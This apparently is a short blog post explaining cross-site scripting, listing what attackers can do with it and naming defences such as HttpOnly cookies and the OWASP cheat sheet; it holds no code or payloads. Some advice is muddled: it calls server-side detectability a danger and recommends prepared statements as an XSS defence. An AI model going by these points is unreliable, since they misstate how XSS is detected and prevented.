What is XSS?

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker wants to execute malicious scripts in the victim's web browser by inserting malicious code into a legitimate website or web application.

The flaws that allow these attacks to succeed are quite common and occur wherever a web application uses user input in the output it generates without validating or coding or sanitising the inputs.

Sometimes even software engineers fail to understand how dangerous it is if it runs on the client side and does not execute on the server side.

Today most applications are SPA, PWA or MPA applications. A lot is going on in the front end, so it is worth keeping security in mind!

Why can an XSS attack be dangerous?

In my opinion, this type of attack is dangerous for at least 3 reasons! The first is that it only takes a few lines of code and a little knowledge of JS to be able to launch such an attack. The second reason why this attack is dangerous is that this injection can be detected from the server level. This is where things start to get complicated and this attack can cause a lot of confusion in the application. The entire attack is carried out from the browser, using text, images, forms or a URL. The third reason? This attack consists of several, or more, steps, consisting of small victories and reaching for more.

What can be done with such an attack?

A lot can be done with such an attack, starting from simple things like clickjacking (the victim clicks on a hidden overlay) to changing account numbers or stealing sessions and cookies. Below are more such examples.

1. You can inject advertising code into a page and make money.
2. With JavaScript, you can access the content of a page and simply replace it.
3. You can download files without clicking.
4. You can use the processing power of your CPU to mine cryptocurrencies (cryptojacking).
5. Log the keys you press.
6. Take screenshots.
7. Take camera shots.
8. Create redirects to other sites.
9. Steal information and send it to your server.
10. Record sounds from a microphone.
11. Know the victim's location.

How do you protect yourself?

A good solution would be to limit the amount of information collected from the user so that we have fewer elements and components that we need to remember to properly protect them against such an attack.

Solutions and defence options against such an attack can be found here: cheatsheetseries.owasp.org/cheatsheets/Cros..

It is worth taking care of at least the Cookies - HttpOnly headers

The HttpOnly flag blocks attempt by APIs other than HTTP to read a cookie with this flag. This means that JavaScript cannot read such a cookie.

It is also useful to use at least prepared statements, to filter data from the user. Keeping your software up to date can also help improve the security of your application.

If you are a developer have a look here: crashtest-security.com/xss-attack-prevention

Summary

Before implementing and developing software, it is worth considering its security. This aspect is still overlooked, as evidenced by the attacks on eBay, Facebook and British Airways. XSS vulnerabilities can vary and pose different risks to your organisation, applications and users. When your website or application is attacked by an XSS attack, the attacker can steal sensitive data, perform unauthorised actions, elevate their privileges or take over a user's active web sessions.